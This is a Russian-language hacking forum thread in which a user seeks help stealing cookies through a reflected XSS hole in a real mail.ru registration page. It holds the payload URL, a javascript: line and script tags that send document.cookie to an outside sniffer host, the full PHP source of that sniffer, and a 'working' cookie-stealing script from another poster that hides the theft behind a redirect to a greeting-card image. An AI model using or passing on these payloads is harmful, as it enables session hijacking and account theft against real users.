вопрос по css

почему работает скрипт:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert('css')</script>

а этот не работает:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>img=new Image();img.src="http://slavaka1.metastock.ru/111.php?"+document.cookie();</script>

P.S. модераторам зачем удаляете мои темы? я жду помощи от людей.

 

а с чего он будет работать? и причем тут css?

 

Сross Site Sсriрting

 

ндааа. просто все рабочее, я хз в чем дело ? пассивку нашол, снифер работает а передать не хочет

 

через эту строку могу куки передать:
javascript:var%20s=document.createElement('script');s.src='http://slavaka1.metastock.ru/111.php?nc='+document.cookie;document.body.appendChild(s);void(0);

а скриптом не получается.
Помогите люди добрые
или скиньте в личку пассивку рабочую

 

администрация помогите мне

 

Администрация тебе не чем не обязана!так что не надо тут кричать.ты бы лучше толком пояснил что ты делал и что не получается?ото без 100грам не разобраться

 

Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:

PHP:

<?php  $fp=fopen("log.html","a+t");  fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp);  ?> 

закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:

Code:

http://3k.mai............nt=1&code="><script>alert('xss')</script>

(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:

Code:

<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>

подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться.

 

Как я вкурил,ты хочеш получить куки методом отправки открытки img.держи рабочий скрипт

Code:

<script>img = new Image(); img.src = "адрес снифера"+document.cookie; // здесь ваш код для кражи кукис
 // редирект через 3 сек.
    var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)
    var speed = 3000
    function reload() {
    document.location = URL
    }
    setTimeout("reload()", speed);
</script>

сохраняй скрипт в расширение img и будет тебе счастье.а так по большому щету и твой скрипт должен быть рабочий.и если надо могу дать сылку на онлайн снифер которым сам пользуюсь

 

о спасибо добрый человек, сейчас буду разбираться. спасибо еще раз

 

чтото я не догоняю этот скрипт сохраняю в img а потом отсылать в теле письма? картинка почему то не отображается не в теле письма не в моем мире. обьсни пожалуста

 

код который тебе дал Travakur555 взят с хакер про, зайди и глянь сам, дальше сам разберешься